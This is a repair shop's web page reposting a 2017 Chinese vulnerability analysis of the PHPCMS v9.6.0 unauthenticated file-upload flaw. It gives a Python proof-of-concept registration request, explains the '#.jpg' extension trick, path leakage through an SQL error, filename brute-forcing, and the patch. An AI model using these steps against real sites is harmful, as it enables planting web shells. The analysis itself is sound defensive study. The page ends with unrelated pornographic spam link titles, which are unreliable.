錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
關于PHPCMS v9.6.0文件上傳漏洞分析
作者: 佚名  日期:2017-04-23 08:32:37   來源: 本站整理

 0x00 漏洞概述漏洞簡介

前幾天 phpcms v9.6 的任意文件上傳的漏洞引起了安全圈熱議,通過該漏洞攻擊者可以在未授權的情況下任意文件上傳,影響不容小覷。phpcms官方今天發布了9.6.1版本,對漏洞進行了補丁修復.

漏洞影響

任意文件上傳

0x01 漏洞復現

本文從 PoC 的角度出發,逆向的還原漏洞過程,若有哪些錯誤的地方,還望大家多多指教。

首先我們看簡化的 PoC :

import re import requestsdef poc(url): u = '{}/index.php?m=member&c=index&a=register&siteid=1'.format(url) data = { 'siteid': '1', 'modelid': '1', 'username': 'test', 'password': 'testxx', 'email': 'test@test.com', 'info[content]': '

', 'dosubmit': '1', } rep = requests.post(u, data=data) shell = '' re_result = re.findall(r'

', rep.content) if len(re_result): shell = re_result[0] print shell

可以看到 PoC 是發起注冊請求,對應的是 phpcms/modules/member/index.php 中的 register 函數,所以我們在那里下斷點,接著使用 PoC 并開啟動態調試,在獲取一些信息之后,函數走到了如下位置:

\

通過 PoC 不難看出我們的 payload 在 $_POST['info'] 里,而這里對 $_POST['info'] 進行了處理,所以我們有必要跟進。

在使用 new_html_special_chars 對 <> 進行編碼之后,進入 $member_input->get 函數,該函數位于 caches/caches_model/caches_data/member_input.class.php 中,接下來函數走到如下位置:

\

由于我們的 payload 是 info[content] ,所以調用的是 editor 函數,同樣在這個文件中:

\

接下來函數執行 $this->attachment->download 函數進行下載,我們繼續跟進,在 phpcms/libs/classes/attachment.class.php 中:

function download($field, $value,$watermark = '0',$ext = 'gif|jpg|jpeg|bmp|png', $absurl = '', $basehref = '') { global $image_d; $this->att_db = pc_base::load_model('attachment_model'); $upload_url = pc_base::load_config('system','upload_url'); $this->field = $field; $dir = date('Y/md/'); $uploadpath = $upload_url.$dir; $uploaddir = $this->upload_root.$dir; $string = new_stripslashes($value); if(!preg_match_all("/(href|src)=([\"|']?)([^ \"'>]+\.($ext))\\2/i", $string, $matches)) return $value; $remotefileurls = array(); foreach($matches[3] as $matche) { if(strpos($matche, '://') === false) continue; dir_create($uploaddir); $remotefileurls[$matche] = $this->fillurl($matche, $absurl, $basehref); } unset($matches, $string); $remotefileurls = array_unique($remotefileurls); $oldpath = $newpath = array(); foreach($remotefileurls as $k=>$file) { if(strpos($file, '://') === false || strpos($file, $upload_url) !== false) continue; $filename = fileext($file); $file_name = basename($file); $filename = $this->getname($filename); $newfile = $uploaddir.$filename; $upload_func = $this->upload_func; if($upload_func($file, $newfile)) { $oldpath[] = $k; $GLOBALS['downloadfiles'][] = $newpath[] = $uploadpath.$filename; @chmod($newfile, 0777); $fileext = fileext($filename); if($watermark){ watermark($newfile, $newfile,$this->siteid); } $filepath = $dir.$filename; $downloadedfile = array('filename'=>$filename, 'filepath'=>$filepath, 'filesize'=>filesize($newfile), 'fileext'=>$fileext); $aid = $this->add($downloadedfile); $this->downloadedfiles[$aid] = $filepath; } } return str_replace($oldpath, $newpath, $value);}

函數中先對 $value 中的引號進行了轉義,然后使用正則匹配:

$ext = 'gif|jpg|jpeg|bmp|png';...$string = new_stripslashes($value);if(!preg_match_all("/(href|src)=([\"|']?)([^ \"'>]+\.($ext))\\2/i",$string, $matches)) return $value;

這里正則要求輸入滿足 src/href=url.(gif|jpg|jpeg|bmp|png) ,我們的 payload (

)符合這一格式(這也就是為什么后面要加 .jpg 的原因)。

接下來程序使用這行代碼來去除 url 中的錨點: $remotefileurls[$matche] = $this->fillurl($matche, $absurl, $basehref); ,處理過后 $remotefileurls 的內容如下:

{C}

\

可以看到 #.jpg 被刪除了,正因如此,下面的 $filename = fileext($file); 取的的后綴變成了 php ,這也就是 PoC 中為什么要加 # 的原因: 把前面為了滿足正則而構造的 .jpg 過濾掉,使程序獲得我們真正想要的 php 文件后綴。

我們繼續執行:

\

程序調用 copy 函數,對遠程的文件進行了下載,此時我們從命令行中可以看到文件已經寫入了:

\

shell 已經寫入,下面我們就來看看如何獲取 shell 的路徑,程序在下載之后回到了 register 函數中:

\

可以看到當 $status > 0 時會執行 SQL 語句進行 INSERT 操作,具體執行的語句如下:

\

也就是向 v9_member_detail 的 content 和 userid 兩列插入數據,我們看一下該表的結構:

\

因為表中并沒有 content 列,所以產生報錯,從而將插入數據中的 shell 路徑返回給了我們:

\

上面我們說過返回路徑是在 $status > 0 時才可以,下面我們來看看什么時候 $status <= 0,在 phpcms/modules/member/classes/client.class.php 中:

\

幾個小于0的狀態碼都是因為用戶名和郵箱,所以在 payload 中用戶名和郵箱要盡量隨機。

另外在 phpsso 沒有配置好的時候 $status 的值為空,也同樣不能得到路徑。

在無法得到路徑的情況下我們只能爆破了,爆破可以根據文件名生成的方法來爆破:

\

僅僅是時間加上三位隨機數,爆破起來還是相對容易些的。

0x02 補丁分析

phpcms 今天發布了9.6.1版本,針對該漏洞的具體補丁如下:

\

在獲取文件擴展名后再對擴展名進行檢測

0x03 參考 https://www.seebug.org/vuldb/ssvid-92930 [漏洞預警]PHPCMSv9前臺GetShell (2017/04/09)
熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
    • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等

    感谢您访问我们的网站,您可能还对以下资源感兴趣:

    91欧美日韩
    主站蜘蛛池模板: 十八禁视频在线观看免费无码无遮挡骂过| 亚洲AV无码专区国产乱码不卡| 亚洲精品无码专区在线在线播放| 亚洲精品无码永久中文字幕| 777爽死你无码免费看一二区| 人妻少妇无码视频在线| 亚洲欧洲美洲无码精品VA| 亚洲精品无码专区| 久久精品无码专区免费东京热| 丰满少妇人妻无码专区| 免费A级毛片无码A∨| 精品无码国产自产拍在线观看蜜| 无码精品A∨在线观看免费| 无码一区二区三区视频| 亚洲日韩精品一区二区三区无码| 欧洲黑大粗无码免费| 亚洲AV无码精品国产成人| 色噜噜综合亚洲av中文无码| 中文字幕av无码专区第一页| 国产午夜激无码av毛片| 在线无码午夜福利高潮视频| 亚洲Aⅴ在线无码播放毛片一线天| 少妇伦子伦精品无码STYLES | 精品无码一区二区三区爱欲九九| 日韩乱码人妻无码中文字幕视频| 亚洲a∨无码精品色午夜| av无码久久久久久不卡网站| 亚洲AV综合色区无码一区爱AV| 本免费AV无码专区一区| 精品无码三级在线观看视频 | 国产AV无码专区亚洲AV麻豆丫| 中文字幕乱偷无码av先锋蜜桃| 无码夫の前で人妻を侵犯| 高清无码v视频日本www| 精品无码av一区二区三区| 亚洲啪AV永久无码精品放毛片| 亚洲一本到无码av中文字幕| 无码高潮爽到爆的喷水视频app| 蜜臀AV无码一区二区三区| 亚洲国产精品无码久久久久久曰| 亚洲AV无码一区二三区|